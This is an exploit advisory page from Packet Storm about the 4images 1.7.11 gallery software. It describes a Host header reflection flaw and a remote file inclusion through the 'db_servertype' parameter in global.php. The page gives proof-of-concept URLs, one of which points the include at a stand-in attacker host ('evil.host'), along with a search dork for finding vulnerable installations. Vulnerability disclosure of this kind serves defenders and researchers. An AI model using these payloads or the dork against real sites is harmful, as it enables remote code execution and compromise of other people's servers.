exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

4images 1.7.11 File Inclusion

4images 1.7.11 File Inclusion
Posted Jun 17, 2015
Authored by indoushka

4images version 1.7.11 suffers from inclusion vulnerabilities due to trusting the host header.

tags | exploit, vulnerability, code execution, file inclusion
SHA-256 | 58c8498e8bf4f00d45c7e52fd8d323c053bb404232140cfc9cb9537707c06ec0

4images 1.7.11 File Inclusion

Change Mirror Download
| # Title    : 4images 1.7.11 Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Powered by 4images 1.7.11
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : http://www.4homepages.de/
=======================================

Host Header Attack :

Vulnerability description :

An attacker can manipulate the Host header as seen by the web application
and cause the application to behave in unexpected ways.
Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP).
Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to:
<link href="http://_SERVER['HOST']"
This vulnerability affects /4images/index.php.
Host header evilhostKdK2IXPv.com was reflected inside a LINK tag (href attribute).

Poc : http://127.0.0.1/4images/top.php/lightbox.php

R/L File inclusion :

C:\web\www\4images\global.php
LIne 400 : include_once(ROOT_PATH.'includes/db_'.strtolower($db_servertype).'.php');
Function : include_once
Variables : $db_servertype

Poc : 127.0.0.1/4images/global.php?db_servertype=http://evil.host

Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close